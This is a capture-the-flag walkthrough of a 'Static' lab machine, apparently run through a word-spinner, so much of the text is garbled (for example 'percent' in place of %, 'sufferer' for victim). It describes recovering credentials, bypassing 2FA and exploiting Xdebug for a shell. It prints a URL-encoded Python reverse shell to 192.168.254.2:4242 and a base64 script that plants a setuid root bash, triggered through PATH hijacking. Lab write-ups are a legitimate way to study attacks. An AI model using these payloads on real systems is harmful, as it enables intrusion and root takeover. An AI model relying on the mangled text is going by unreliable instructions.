Breaking News



On this put up, I wish to percentage a walkthrough of the Static Gadget.

This room has been thought to be problem rated as a Exhausting device

Knowledge Collecting on Static Gadget

As soon as we’ve began the VPN connection, we will be able to get started data accumulating at the device by means of executing the command nmap -sC -sV <IP Cope with> -PN 

From the outcome, we were given a couple of ports open reminiscent of:

  • 21: vsftpd 3.0.3
  • 22: OpenSSH 8.2p1
  • 80: gunicorn

Let’s get admission to the site interface reminiscent of static.htb:8080/.ftp_uploads/

There are two information that we will be able to see over right here

When I attempt to open caution.txt

We can wish to obtain and save the db.sql.gz onto our device and check out to have a look at what has saved within the record

Unfortunately, the record has been corrupted simply been discussed on caution.txt

Let’s perform some research on methods to recuperate the record on the web

The results of the analysis didn’t display the rest helpful for now. Let’s scroll down and hope that we will be able to in finding any helpful gear to make use of

We controlled to discover a device known as gzrecover on GitHub.

Gaining Privilges Get entry to on Static device

The gear can also be downloaded over right here

As soon as the gzrocover is totally put in, we will be able to run it by means of the use of the command sudo ./gzrecover db.sql.gz

We controlled to recuperate the record and let’s learn the record that has been recovered

Alternatively, the record comprises some encrypted code but it surely’s glaring that it presentations some MySQL instructions. After decrypting the record, you’re going to in finding out that there are credentials stored there.

  • username=admin
  • password=admin

Looking to bypass 2FA authentication

We realize that static.htb:8080 has a listing reminiscent of /vpn/ from our nmap consequence.

I discovered that login.php is working on /vpn/ listing which result in a login web page

After you have entered the credentials at the login web page, it’ll redirect to 2FA Enabled web page that appears one thing reminiscent of proven above

We can wish to bypass the 2FA Enabled by means of working the command above.

It’ll display an Inner IT Improve portal the place you want to generate any title so a brand new VPN might be downloaded to your device

Downloading openvpn

From the vpn record, I realize there’s some other subdomain reminiscent of vpn.static.htb been written there.

Let’s the vpn that we have got downloaded up to now

We will have to be re-route the OpenVPN’s IP to 172.20.0.0/24

We will have to be capable of get admission to the URL 172.20.0.10 which comprises the data.php record saved over there.

Let’s get started our NC listener on our device

We will have to be beginning the exploit by means of working python2 exploit.py

## I’ve renamed the python record to milk.py ##

I’ve check out the command as above however not anything occur on my nc listener

It paintings in this payload despite the fact that

After coming into the opposite shell payload, you will have to get admission to the site 172.20.0.10/data.php?XDEBUG_SESSION_START=phpstorm

Voila! In consequence, we were given the opposite shell connection again to us.

After all, we will have to be capable of learn the consumer flag by means of typing “cat consumer.txt

Escalate to Root Privileges Get entry to

Alternatively, we wish to switch ncat out of your device to the sufferer’s device

We will have to execute the port forwarding by means of executing the command ssh -N -L <anyport>:192.168.254.3:80 -i id_rsa [email protected]

Subsequent, we wish to exploit it by means of the use of the command ./phuip-fpizdam http://native:<anyport>/index.php

Subsequently, we wish to execute the command beneath to your browser

localhost:<anyport>/index.php?a=/usr/bin/python3.6percent20-cpercent20percent27importpercent20socketpercent2Csubprocesspercent2Cospercent3Bspercent3Dsocket.socket(socket.AF_INETpercent2Csocket.SOCK_STREAM)%3Bs.attach((%22192.168.254.2percent22percent2C4242))%3Bos.dup2(s.fileno()%2C0)%3Bpercent20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimportpercent20ptypercent3Bpercent20pty.spawn(%22percent2Fbinpercent2Fbashpercent22)%27percent0A

After all, we controlled to get the opposite shell connection again to us

Let’s execute the next the command

echo 'IyEvYmluL2Jhc2gKL2Jpbi9jcCAvYmluL2Jhc2ggL3RtcC9iYXNoIC0tbm8tcHJlc2VydmU9YWxsCi9iaW4vY2hvd24gcm9vdDpyb290IC90bXAvYmFzaAovYmluL2NobW9kIDQ3NzcgL3RtcC9iYXNoCg==' | base64 -d > /tmp/readlink

After that, we will have to rename the readlink record into sed (it shouldn’t topic at the naming)

After you have renamed the record, we wish to execute the export PATH=/tmp:$PATH sooner than we continue with your next step

As soon as that has been carried out, we will be able to now execute the next command:

  • /usr/bin/ersatool
  • create
  • x
  • input
  • go out

Eventually, we will have to be capable of see the bash record at the /tmp/ listing

Subsequent step, we wish to execute the bash -p command on /tmp/ listing

After all, we will have to be capable of learn the foundation flag by means of working the “cat /root/root.txt” command


Leave a Reply

Your email address will not be published.

Donate Us

X